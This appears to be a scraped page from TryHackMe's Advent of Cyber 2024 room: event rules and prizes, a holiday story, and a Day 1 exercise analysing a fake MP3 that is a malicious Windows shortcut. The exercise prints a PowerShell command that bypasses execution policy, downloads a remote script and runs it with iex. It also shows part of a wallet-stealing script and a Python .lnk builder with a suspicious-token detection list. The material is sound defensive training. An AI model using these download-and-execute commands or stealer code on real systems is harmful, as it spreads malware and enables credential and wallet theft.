<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form>
You need to enable JavaScript to run this app. * Learn * Compete * For Education * For Business * Pricing Learn Compete For Education For Business Pricing Log In Join for FREE Log In Join for FREE * Learn * Advent of Cyber 2024 ADVENT OF CYBER 2024 Dive into the wonderful world of cyber security by engaging in festive beginner-friendly exercises every day in the lead-up to Christmas! easy 1440 min Share the challengeHelp 6764 Room progress ( 0% ) To access material, start machines and answer questions login. Advent of Cyber - Day 7: Detecting Malicious Behavior in AWS! • Source: YouTube Task 1Introduction Welcome to Advent of Cyber 2024 WELCOME TO ADVENT OF CYBER 2024! In this year’s Advent of Cyber, can you help McSkidy and the Glitch defend SOC-mas against the evil Mayor Malware’s plans? Dive into the wonderful world of cyber security by engaging in festive beginner-friendly exercises every day in the lead-up to Christmas! Advent of Cyber is available to all TryHackMe users, and best of all, it's free to participate in. You’ll also be in with the chance of winning from this year’s huge $100,000 prize draw. The more questions you complete, the higher your chances of winning BIG! Think of it like an advent calendar, but with exciting (and festive) security challenges instead of chocolate. MAIN PRIZES This year is our biggest and best prize draw yet, with over $100,000 worth of prizes! In this event, the number of questions you answer really matters! For each question you answer correctly, you'll receive a raffle ticket. The more raffle tickets you collect, the higher your chances of winning big! To be in with the chance of winning the grand prize of DEF CON tickets with accommodation, you’ll need to complete every task in this room by December 31st! This will also earn you a certificate of completion. 
Here are the prizes up for grabs:

* 15x Samsung Monitor ($300.00)
* 7x GRID Backpack ($225.00)
* 20x JBL Headphones ($130.00)
* 15x Branded Cotton Canvas Backpack ($65.00)
* 4x Sony Headphones ($450.00)
* 3x PAC-MAN™ Deluxe Arcade Game ($500.00)
* 5x Desk Chair ($249.00)
* 20x Large Arlo Tech Organizer ($70.00)
* 20x The Sidekick Tech Kit ($50.00)
* 15x Branded Apple AirPods Pro (2nd Gen) ($300.00)
* 10x Apple TV 4K 64GB (3rd generation) ($149.00)
* 10x Personalized Catch:3 Classics, Italian Leather ($190.00)
* 15x Clutch® Pro USB-C for Android and iPhone 15+ ($50.00)
* 500x THM Subscription (1 Month) ($14.00)
* 5x Stilosa 15 Bar Pump Espresso Machine ($150.00)
* 300x THM Subscription (3 Months) ($42.00)
* 5x Infinity Game Board™ ($500.00)
* 25x THM Subscription (6 Months) ($84.00)
* 20x Branded MagSafe Charger ($45.00)
* 5x THM Subscription (12 Months) ($126.00)
* 5x Duo Standing Desk ($499.00)
* 400x TryHackMe Swag Gift Cards ($10.00)
* 10x Nintendo Switch 32GB Lite ($250.00)
* 300x TryHackMe Swag Gift Cards ($20.00)
* 3x Switch OLED Model w/ Neon Red & Neon Blue Joy-Con ($420.00)
* 150x TryHackMe Swag Gift Cards ($50.00)
* 10x Solar Charger and Emergency Radio ($50.00)
* 80x TryHackMe Swag Gift Cards ($75.00)
* 2x PlayStation VR2 ($600.00)
* 20x TryHackMe Swag Gift Cards ($100.00)
* 5x Beosound Explore Outdoor Bluetooth Speaker ($249.00)
* 200x Hacktivities Cards ($20.00)
* 10x Therabody SmartGoggles ($199.00)
* 5x DEF CON ($460.00)
* 10x Ornata V3 Full-Size Wired Mecha-Membrane Gaming Keyboard with Chroma RGB Backlighting ($79.00)
* GRAND PRIZE: 3x DEF CON + Accommodation ($1,500.00)

All winners will be chosen at random, verified by our team (no cheating allowed!), and announced on Monday, January 6th, 2025.
GENERAL RULES

Breaking any of the following rules will result in elimination from the event:

* .tryhackme.com and the OpenVPN server are off-limits to probing, scanning, or exploiting
* Users are only authorised to hack machines deployed in the rooms they have access to
* Users are not to target or attack other users
* Users should only enter the event once, using one account
* Answers to questions are not to be shared unless shown on videos/streams
* Cheating
* Usage of bot accounts

For the prize raffle terms and conditions, please visit this page.

Please note: Cheating is NOT allowed and will result in a disqualification from the Advent of Cyber event. All winners will be fully verified. This includes, in particular:

* creating puppet accounts to inflate your chance to win
* using bots to auto-complete the answers in the room

HOW TO QUALIFY

To qualify for the main prizes, you must answer questions in the Advent of Cyber 2024 challenges, starting with Day 1 (Task 7 of this room). Only questions answered in the Advent of Cyber 2024 room will qualify you for the raffle.

* It doesn't matter when you complete tasks. You just need to complete them by 31st December 2024. For example, if you complete questions from Day 1 on 31st December 2024, you will still receive the same amount of raffle tickets as a user who completes on the day of the task release!
* You don't have to complete all the questions or complete them in order. The more questions you answer, the more raffle tickets you get and the higher your chances of winning.
* Please visit this page to read the detailed Raffle Terms and Conditions.

IMPORTANT NOTE: The raffle tickets will not be visible on your profile. The number of raffle tickets you have always equals the number of questions you answer in this room.

CERTIFICATE & BADGE

Finally, if you complete every task in the event, you will earn a certificate of completion and a badge!
As your name will be included on the certificate, we advise ensuring your full name is set (and updated) in your profile.

FEATURED VIDEOS

Each task released has a supporting video walkthrough to guide you through. You can expect to see some of your favourite cyber security video creators. The most recent day’s video will display at the top of the room, but all videos will be available within the relevant task content. This year's Advent of Cyber featured creators include 0day, UnixGuy, Gerald Auger, Tyler Ramsbey, Bearded I.T. Dad, Day Cyberwox, Marcus Hutchins, David Alves, InsiderPHD, Tib3rius, KevTech, Cyb3rMaddy, and more!

Answer the questions below:
* I have read the rules and raffle Terms and Conditions.

Task 2 (Introduction): Join our community

JOIN OUR COMMUNITY

Follow us on social media for exclusive giveaways, Advent of Cyber task releases, and our prize draw announcement!

* Follow us on LinkedIn!
* Be a part of our community and join our Discord!
* Follow us on X to receive daily challenge posts!
* Join us on Instagram!
* Follow us on Facebook!
* Join our growing subreddit!
* Follow our TikToks!

JOIN OUR DISCORD

Discord is the heartbeat of the TryHackMe community. It's where we go to connect with fellow hackers, get help with difficult rooms, and find out when a new room launches. Our Discord server has over 220,000 members (and continues to grow every day), so there's always something happening. Are you excited about Advent of Cyber? Visit a dedicated channel on our Discord, where you can chat with other participants in the event and follow the daily releases! If you haven't used it before, it's very easy to set up (we recommend installing the app). We'll ask a couple of onboarding questions to help figure out which channels are most relevant to you.

WHAT DO YOU GET WITH DISCORD?

There are so many benefits to joining:

* Discuss the day's Advent of Cyber challenges and receive support in a dedicated channel.
* Discover how to improve your job applications and fast-track your way into a cyber career.
* Learn about upcoming TryHackMe events and challenges.
* Browse discussion forums for all of our learning paths and releases.

Click on this link to join our Discord Server: Join the Community!

GRAB YOUR SWAG!

Want to rep swag from your favourite cyber security training platform? We have a NEW special edition Advent of Cyber swag, now available for order!

Answer the questions below:
* Join our Discord and say hi!
* Is there a dedicated Advent of Cyber channel on TryHackMe Discord where users can discuss daily challenges and receive dedicated support? (yes/no)
* Follow us on LinkedIn!
* Follow us on X!
* Check out the subreddit!
* Join us on Instagram!
* Follow us on Facebook!
* Follow our TikToks!

Task 3 (Introduction): Completing Advent of Cyber as an organisation

COMPLETING ADVENT OF CYBER AS AN ORGANISATION

With TryHackMe for Business, you:

* Get full unlimited access to all of TryHackMe's content and features (excluding cloud content and SOC Sim)
* Leverage competitive learning and collectively engage your team in Advent of Cyber tasks, measuring their progress
* Create customised learning paths to dive into training topics based on Advent of Cyber and beyond
* Training for Defensive, Offensive, and Cloud Security teams
* Advanced admin reports and dashboards
* Implementation support for your organisation, SSO integration, and Customer Success Manager
* Build your own custom capture-the-flag events on demand!

If you're interested in exploring TryHackMe's business benefits through a FREE trial, please contact sales@tryhackme.com. For more information about our offering, check out the business page. If you’re an existing client and want to get your wider team and company involved, please reach out to your dedicated Customer Success Manager!
Answer the questions below:
* Get your team to work on Advent of Cyber together!

Task 4 (Introduction): How to use TryHackMe

A SHORT TRYHACKME TUTORIAL

New tasks are released daily at 4pm GMT, with the first challenge being released on 1st December. They will vary in difficulty (although they will always be aimed at beginners). Each task in the event will include instructions on how to interact with the practical material. Please follow them carefully! The instructions will include a connection card similar to the one shown below. Let's work our way through the different options.

If the AttackBox option is available: TryHackMe's AttackBox is an Ubuntu Virtual Machine hosted in the cloud. Think of the AttackBox as your virtual computer, which you would use to conduct a security engagement. There will be multiple tasks during the event that will ask you to deploy the AttackBox. You can deploy the AttackBox by clicking the "Start AttackBox" button at the top of this page. Using the web-based AttackBox, you can complete exercises through your browser. If you're a regular user, you can deploy the AttackBox for free for 1 hour a day. If you're subscribed, you can deploy it for an unlimited amount of time! Please note that you can use your own attacker machine instead of the AttackBox. In that case, you will need to connect using OpenVPN. Instructions on how to set up OpenVPN are here. You can open the AttackBox full-screen view in a new tab using this button.

If the VM option is available: Most tasks in Advent of Cyber will have a virtual machine attached to them. You will use some of them as targets to train your offensive security skills and some of them as hosts for your analysis and investigations. If this option is available, you need to click the "Start Machine" button. After the machine is deployed, you will see a frame appear at the top of the room. It will display some important information, like the IP address of the target machine, as well as options to extend the machine's timer or terminate it.

If the split-screen option is available: Some tasks will allow you to view your deployed VM in a split-screen view. Typically, if this option is enabled, the split screen will open automatically. If it doesn't, you can click this button at the top of the page for the split screen to open. Please note that you can open split-screen virtual machines in another tab using this button.

If there's a direct link available: Some virtual machines allow you to view the necessary content directly in another tab on your browser. In this case, you'll be able to see a link to the virtual machine directly in the task content. Please note that for the link to work, you first need to deploy the virtual machine attached to the task.

If there is a direct connection option available: Some tasks will allow you to connect to the virtual machines attached using RDP, SSH, or VNC. This is always optional, and virtual machines with this enabled will also be accessible via a split screen. In these cases, login credentials will be provided, like in the image below. We provide this as some users might prefer to connect directly. However, please note that some tasks will deliberately have this option disabled. If no credentials are given, direct connection is not possible.

Answer the questions below:
* Got it!

Task 5 (Introduction): How the Glitch Stole SOC-mas

HOW THE GLITCH STOLE SOC-MAS

The snow is falling on the tech town of Wareville, and all the different Ware families are gathering in the town square, getting ready for a town meeting. We see the Softwares and the Freewares, skating down the neon-lit frostlanes. We turn to Server Street, and see the Hardwares and the Firmwares marching downtown, festive server lights blinking and flickering in their eyes.
It’s time to start preparing for SOC-mas, the most joyous time of the year in the tech town of Wareville.

If we lift our eyes, we’ll see, beyond the buzzing city, a snow-covered mountain of discarded technology. Boulders of old printers, cracked monitor cliffs, and server rack ridges, held together by vines of ethernet cables, and a single old gaming chair at the peak - this is Mount Hackit, and no Wares dare to go there. They fear it not because of the frequent floppy disk avalanches; the Wares avoid Mount Hackit because of the Glitch.

The Glitch’s lair is hidden in a deep cave, and he’s there now. He grabs a few cables hanging from the ceiling and plugs them in. Although not as new and shiny as Wareville’s, his servers work just fine! The Glitch has been watching Wareville’s security for years, and this SOC-mas will not be different. The Wares might fear the Glitch, thinking he is an evil hacker, but it doesn’t matter. Cracking his fingers, he starts typing, establishing the connection to the town’s network. Time to hack!

Back in the town square, Marta May Ware, the SOC-mas organiser, is climbing up on the stage to address the town when all the lights suddenly flicker. All the Wares look around, confused, but it passes quickly, and everything returns to normal.

In the city hall, Mayor Malware slams his fists on his desk. “Blocked again!” he shouts angrily. “That insufferable Glitch is at it again!” The mayor’s plan to stop SOC-mas preparation by sabotaging tonight's meeting was unsuccessful. He’ll have to think of something better for tomorrow…

In the meantime, Wareville’s SOC is in chaos. Analysts are trying to discover what caused the sudden power surge that threatened all tech in the town. McSkidy Software, the town’s leading cyber security expert, points at a log file on the screen and exclaims, “Now, I don’t know exactly what happened, but this proves we had a connection from Mount Hackit!” McSkidy runs out of the SOC and heads up the mountain.
When she reaches the cave, she does not expect to see the Glitch waiting for her, two cups of hot cocoa in his hands, and his dog curled up at his feet. It takes most of the evening, but the Glitch explains what he’s been doing: protecting the town from Mayor Malware’s evil plans. It looks like the mayor wants to completely stop SOC-mas from happening this year! The Glitch knows the Wares might mistrust or hate him, but he wants to help.

Now, united by a common purpose, McSkidy and the Glitch start their work in the Mount Hackit cave, because they’re the only ones standing between Wareville and chaos. Come back on December 1st to help McSkidy and the Glitch defend SOC-mas against the evil Mayor Malware’s plans!

Answer the questions below:
* Sounds serious! I will be here to help the Glitch on December 1st!

Task 6 (Introduction): Subscribe to TryHackMe with a 30% discount!

SUBSCRIBE WITH A DISCOUNT!

The Advent of Cyber event is completely free! However, we recommend checking out some of the reasons to subscribe. To celebrate Advent of Cyber, you can get 30% off personal annual subscriptions using the discount code AOC2024 at checkout. This discount is valid until 31st December, 2024, at 23:59 GMT.

Answer the questions below:
* Share the discount with your friends!

Task 7 (OPSEC): Day 1: Maybe SOC-mas music, he thought, doesn't come from a store?

Task includes a deployable machine.

The Story

McSkidy tapped keys with a confident grin,
A suspicious website, now where to begin?
She'd seen sites like this, full of code and of grime,
Shady domains, and breadcrumbs easy to find.

McSkidy's fingers flew across the keyboard, her eyes narrowing at the suspicious website on her screen. She had seen dozens of malware campaigns like this. This time, the trail led straight to someone who went by the name "Glitch."

"Too easy," she muttered with a smirk.

"I still have time," she said, leaning closer to the screen. "Maybe there's more."

Little did she know, beneath the surface lay something far more complex than a simple hacker's handle. This was just the beginning of a tangled web unravelling everything she thought she knew.

LEARNING OBJECTIVES

* Learn how to investigate malicious link files.
* Learn about OPSEC and OPSEC mistakes.
* Understand how to track and attribute digital identities in cyber investigations.

CONNECTING TO THE MACHINE

Before moving forward, review the questions in the connection card shown below and start the virtual machine by pressing the Start Machine button. The VM should be fully loaded in 3 minutes. Additionally, you will need the AttackBox, which can be launched by clicking the Start AttackBox button at the top of the page.

NOTE: If you’re clicking "Start Machine" and encountering an issue launching it, don’t worry: it’s just the high demand. What can you do?

* Keep trying! Machines are becoming available as demand fluctuates.
* If you’re still having trouble, come back a little later when it’s less busy.

INVESTIGATING THE WEBSITE

The website we are investigating is a YouTube to MP3 converter currently being shared amongst the organizers of SOC-mas. You've decided to dig deeper after hearing some concerning reports about this website. From your AttackBox, access the website by visiting MACHINE_IP using the web browser.

At first glance, the website looks legit and presentable. The About page even says that it was made by "The Glitch". How considerate of them to make our job easier! Scrolling down, you'll see the feature list, which promises to be "Secure" and "Safe." From our experience, that isn't very likely.

YOUTUBE TO MP3 CONVERTER WEBSITES

These websites have been around for a long time. They offer a convenient way to extract audio from YouTube videos, making them popular. However, historically, these websites have been observed to carry significant risks, such as:

* Malvertising: Many sites contain malicious ads that can exploit vulnerabilities in a user's system, which could lead to infection.
* Phishing scams: Users can be tricked into providing personal or sensitive information via fake surveys or offers.
* Bundled malware: Some converters may come with malware, tricking users into unknowingly running it.

What nefarious thing does this website have in store for us?

GETTING SOME TUNES

Let's find out by pasting any YouTube link in the search form and pressing the "Convert" button. Then select either the mp3 or mp4 option. This should download a file that we could use to investigate. For example, we can use https://www.youtube.com/watch?v=dQw4w9WgXcQ, a classic if you ask me.

Once downloaded, navigate to your Downloads folder or, if you are using the AttackBox, to your /root/ directory. Locate the file named download.zip, right-click on it, and select Extract To. In the dialog window, click the Extract button to complete the extraction. You'll now see two extracted files: song.mp3 and somg.mp3.

To quickly determine the files' contents, double-click on the "Terminal" icon on the desktop, then run the file command on each one. First, let's try checking song.mp3.

Check File 1

    user@tryhackme:~$ file song.mp3
    download.mp3: Audio file with ID3 version 2.3.0, contains:MPEG ADTS, layer III, v1, 192 kbps, 44.1 kHz, Stereo

There doesn't seem to be anything suspicious, according to the output. As expected, this is just an MP3 file. How about the second file, somg.mp3? From the filename alone, we can tell something is not right. Still, let's confirm by running the file command on it anyway.
Check File 2

    user@tryhackme:~$ file somg.mp3
    somg.mp3: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Sat Sep 15 07:14:14 2018, mtime=Sat Sep 15 07:14:14 2018, atime=Sat Sep 15 07:14:14 2018, length=448000, window=hide

Now, this is more interesting! The output tells us that instead of an MP3, the file is an "MS Windows shortcut", also known as a .lnk file. This file type is used in Windows to link to another file, folder, or application. These shortcuts can also be used to run commands! If you've ever seen the shortcuts on a Windows desktop, you already know what they are.

There are multiple ways to inspect .lnk files to reveal the embedded commands and attributes. For this room, however, we'll use ExifTool, which is already installed on this machine. To do this, go back to your Terminal and type:

Using ExifTool

    user@tryhackme:~$ exiftool somg.mp3

Look through the output to locate the command used as a shortcut in the somg.mp3 file. If you scroll down through the output, you should see a PowerShell command.

Using ExifTool

    ...
    Relative Path                   : ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Working Directory               : C:\Windows\System32\WindowsPowerShell\v1.0
    Command Line Arguments          : -ep Bypass -nop -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1','C:\ProgramData\s.ps1'); iex (Get-Content 'C:\ProgramData\s.ps1' -Raw)"
    Machine ID                      : win-base-2019
    user@tryhackme:~#

What this PowerShell command does:

* The -ep Bypass -nop flags disable PowerShell's usual restrictions, allowing scripts to run without interference from security settings or user profiles.
* The DownloadFile method pulls a file (in this case, IS.ps1) from a remote server (https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1) and saves it in the C:\ProgramData\ directory on the target machine.
* Once downloaded, the script is executed with PowerShell using the iex command, which triggers the downloaded s.ps1 file.

If you visit the contents of the file to be downloaded using your browser (https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1), you will see just how lucky we are that we are not currently using Windows.

PowerShell Script

    function Print-AsciiArt {
        Write-Host " ____ _ ___ _____ ___ _ _ "
        Write-Host " / ___| | | |_ _||_ _| / __| | | | |"
        Write-Host "| | _ | | | | | | | | | |_| |"
        Write-Host "| |_| | | |___ | | | | | |__ | _ |"
        Write-Host " \____| |_____| |___| |_| \___| |_| |_|"
        Write-Host " Created by the one and only M.M."
    }

    # Call the function to print the ASCII art
    Print-AsciiArt

    # Path for the info file
    $infoFilePath = "stolen_info.txt"

    # Function to search for wallet files
    function Search-ForWallets {
        $walletPaths = @(
            "$env:USERPROFILE\.bitcoin\wallet.dat",
            "$env:USERPROFILE\.ethereum\keystore\*",
            "$env:USERPROFILE\.monero\wallet",
            "$env:USERPROFILE\.dogecoin\wallet.dat"
        )
        Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"
        foreach ($path in $walletPaths) {
            if (Test-Path $path) {
                Add-Content -Path $infoFilePath -Value "Found wallet: $path"
            }
        }
    }

    [Output truncated for brevity]

The script is designed to collect highly sensitive information from the victim's system, such as cryptocurrency wallets and saved browser credentials, and send it to an attacker's remote server.

Disclaimer: All content in this room, including CPP code, PowerShell scripts, and commands, is provided solely for educational purposes. Please do not execute these on a Windows host.
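Before moving on to the signature, an added example (not part of the room's material) that does the same extraction ExifTool performed on the shortcut: a small Shell Link parser in Python builds a constructed .lnk in memory with the field layout seen above, reads back the relative path, working directory and command line arguments, and flags the tokens an analyst would look for (-ep Bypass, -nop, DownloadFile, iex). The download URL in the constructed sample is a placeholder rather than the one from the room; the header offsets and flag values follow the MS-SHLLINK layout.

```python
import struct

# Shell Link (.lnk) header constants from the MS-SHLLINK layout.
HEADER_SIZE = 0x4C                      # first four bytes: 4C 00 00 00, the "L" that file(1) keys on
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7                  # window opens minimised and inactive, so the console is never seen
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

# Argument tokens that warrant an analyst's attention (matched case-insensitively).
SUSPICIOUS_TOKENS = ("-ep bypass", "-executionpolicy bypass", "-nop", "-w hidden",
                     "downloadfile", "downloadstring", "iex", "invoke-expression", "frombase64string")
SCRIPT_HOSTS = ("powershell", "cmd.exe", "wscript", "cscript", "mshta", "rundll32")


def build_lnk(relative_path, working_dir, arguments, show_command=SW_SHOWMINNOACTIVE):
    """Assemble a minimal Unicode .lnk: header plus three StringData fields, no IDList or LinkInfo."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0x20,            # FileAttributes: FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,         # creation/access/write FILETIMEs (zero in this sample)
                         448000,          # FileSize of the target, the length file(1) reported above
                         0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments))
    return header + body


def parse_lnk(data):
    """Return the StringData fields and ShowCommand of a .lnk, skipping IDList and LinkInfo if present."""
    if len(data) < HEADER_SIZE or data[:4] != b"L\x00\x00\x00" or data[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]   # IDListSize + IDList bytes
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]       # LinkInfoSize covers the whole structure
    unicode = bool(flags & IS_UNICODE)
    fields = {"show_command": show_command}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]     # CountCharacters, not bytes
        pos += 2
        size = count * 2 if unicode else count
        raw = data[pos:pos + size]
        fields[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
        pos += size
    return fields


def suspicious_indicators(fields):
    """List the reasons an analyst would escalate this shortcut; empty for a plain file link."""
    hits = []
    target = (fields.get("relative_path", "") + " " + fields.get("working_dir", "")).lower()
    if any(h in target for h in SCRIPT_HOSTS):
        hits.append("target is a script host: " + fields.get("relative_path", ""))
    args = fields.get("arguments", "").lower()
    hits.extend(t for t in SUSPICIOUS_TOKENS if t in args)
    if fields["show_command"] == SW_SHOWMINNOACTIVE and args:
        hits.append("window minimised while passing arguments")
    return hits


def triage(data):
    fields = parse_lnk(data)
    return {"fields": fields, "indicators": suspicious_indicators(fields)}


# Constructed samples: the layout mirrors the ExifTool output above; the URL is a placeholder.
SAMPLE_MALICIOUS = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"C:\Windows\System32\WindowsPowerShell\v1.0",
    "-ep Bypass -nop -c \"(New-Object Net.WebClient).DownloadFile("
    "'https://example.invalid/IS.ps1','C:\\ProgramData\\s.ps1'); "
    "iex (Get-Content 'C:\\ProgramData\\s.ps1' -Raw)\"")
SAMPLE_BENIGN = build_lnk(r"..\..\Windows\notepad.exe", r"C:\Windows", "", show_command=1)

if __name__ == "__main__":
    for name, blob in (("somg.mp3 (constructed)", SAMPLE_MALICIOUS), ("benign shortcut", SAMPLE_BENIGN)):
        result = triage(blob)
        print(name, "->", result["fields"].get("relative_path"), result["indicators"])
```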
The downloaded script looks fairly typical of a PowerShell script for such a purpose, with one notable exception: a signature in the code that reads:

> Created by the one and only M.M.

SEARCHING THE SOURCE

There are many paths we could take to continue our investigation. We could investigate the website further, analyse its source code, or search for open directories that might reveal more information about the malicious actor's setup. We could search for the hash or signature on public malware databases like VirusTotal or Any.Run. Each of these methods could yield useful clues. However, for this room, we'll try something a bit different. Since we already have the PowerShell code, searching for it online might give us useful leads. It's a long shot, but we'll explore it in this exercise.

There are many places where we can search for code. The most widely used is GitHub, so let's try searching there. To search effectively, we can look for unique parts of the code that we could use to search with. The more distinctive, the better. For this scenario, we have the string we've uncovered before that reads: "Created by the one and only M.M."

Search for this on GitHub.com or by going directly to this link: https://github.com/search?q=%22Created+by+the+one+and+only+M.M.%22&type=issues

You'll notice something interesting if you explore the pages in the search results.

NOTE! If you receive an error below, it's because GitHub has rate limits in place if you are not signed in. To fix this, you can just sign in with a GitHub account or skip directly to the next step by going here: https://github.com/Bloatware-WarevilleTHM/CryptoWallet-Search/issues/1

If you look through the search results, you can infer the malicious actor's identity based on information on the project's page and the GitHub Issues section. Aha! Looks like this user has made a critical mistake.

INTRODUCTION TO OPSEC

This is a classic case of OPSEC failure.
Operational Security (OPSEC) is a term originally coined in the military to refer to the process of protecting sensitive information and operations from adversaries. The goal is to identify and eliminate potential vulnerabilities before an adversary can use them to learn who is behind the operation. In the context of cyber security, when malicious actors fail to follow proper OPSEC practices, they might leave digital traces that can be pieced together to reveal their identity. Some common OPSEC mistakes include:

* Reusing usernames, email addresses, or account handles across multiple platforms. One might assume that anyone trying to cover their tracks would remove such obvious and incriminating information, but sometimes, it's due to vanity or simply forgetfulness.
* Using identifiable metadata in code, documents, or images, which may reveal personal information like device names, GPS coordinates, or timestamps.
* Posting publicly on forums or GitHub (like in the current scenario) with details that tie back to their real identity or reveal their location or habits.
* Failing to use a VPN or proxy while conducting malicious activities, which allows law enforcement to track their real IP address.

You'd think that someone doing something bad would make OPSEC their top priority, but they're only human and can make mistakes, too. For example, here are some real-world OPSEC mistakes that led to some really big fails:

ALPHABAY ADMIN TAKEDOWN

One of the most spectacular OPSEC failures involved Alexandre Cazes, the administrator of AlphaBay, one of the largest dark web marketplaces:

* Cazes used the email address "pimp_alex_91@hotmail.com" in early welcome emails from the site.
* This email included his year of birth and other identifying information.
* He cashed out using a Bitcoin account tied to his real name.
* Cazes reused the username "Alpha02" across multiple platforms, linking his dark web identity to forum posts under his real name.

CHINESE MILITARY HACKING GROUP (APT1)

There's also the notorious Chinese hacking group APT1, which made several OPSEC blunders:

* One member, Wang Dong, signed his malware code with the nickname "Ugly Gorilla".
* This nickname was linked to programming forum posts associated with his real name.
* The group used predictable naming conventions for users, code, and passwords.
* Their activity consistently aligned with Beijing business hours, making their location obvious.

These failures provided enough information for cyber security researchers and law enforcement to publicly identify group members.

UNCOVERING MM

If you've thoroughly investigated the GitHub search result, you should have uncovered several clues based on poor OPSEC practices by the malicious actor. We know the attacker left a distinctive signature in the PowerShell code (MM). This allowed us to search for related repositories and issues pages on GitHub. We then discovered an Issues page where the attacker engaged in discussions, providing more context and linking their activity to other projects. In this discussion, they responded to a query about modifying the code. This response, paired with their unique handle, was another critical slip-up, leaving behind a trail of evidence that can be traced back to them. By analysing the timestamps, usernames, and the nature of their interactions, we can now attribute the mastermind behind the attack to MM.

WHAT'S NEXT?

McSkidy dug deeper, her mind sharp and quick,
But something felt off, a peculiar trick.
The pieces she’d gathered just didn’t align,
A puzzle with gaps, a tangled design.

As McSkidy continued digging, a pattern emerged that didn't fit the persona she was piecing together. A different handle appeared in obscure places, buried deep in the details: "MM."

"Who's MM?" McSkidy muttered, the mystery deepening.
Even though all signs on the website seemed to point to Glitch as the author, it became clear that someone had gone to great lengths to ensure Glitch's name appeared everywhere. Yet, the scattered traces left by MM suggested a deliberate effort to shift the blame.

Answer the questions below:
* Looks like the song.mp3 file is not what we expected! Run "exiftool song.mp3" in your terminal to find out the author of the song. Who is the author?
* The malicious PowerShell script sends stolen info to a C2 server. What is the URL of this C2 server?
* Who is M.M? Maybe his GitHub profile page would provide clues?
* What is the number of commits on the GitHub repo where the issue was raised?
* If you enjoyed this task, feel free to check out the OPSEC room!
* What's with all these GitHub repos? Could they hide something else?

Task 8 (Log analysis): Day 2: One man's false positive is another man's potpourri.

Task includes a deployable machine.

The Story

It’s the most wonderful time of the year again, and it’s also the most stressful day for Wareville’s Security Operations Center (SOC) team. Despite the overwhelming alerts generated by the new and noisy rules deployed, Wareville’s SOC analysts have been processing them nonstop to ensure the safety of the town. However, the SOC analysts are now burning out from all the workload needed before Christmas. Numerous open cases are still pending, and similar alerts are still firing repeatedly, making them think of the possibility of false positives out of all this mess. Now, help the awesome Wareville SOC team analyse the alerts to determine whether the rumour is true: that Mayor Malware is instigating chaos within the town.

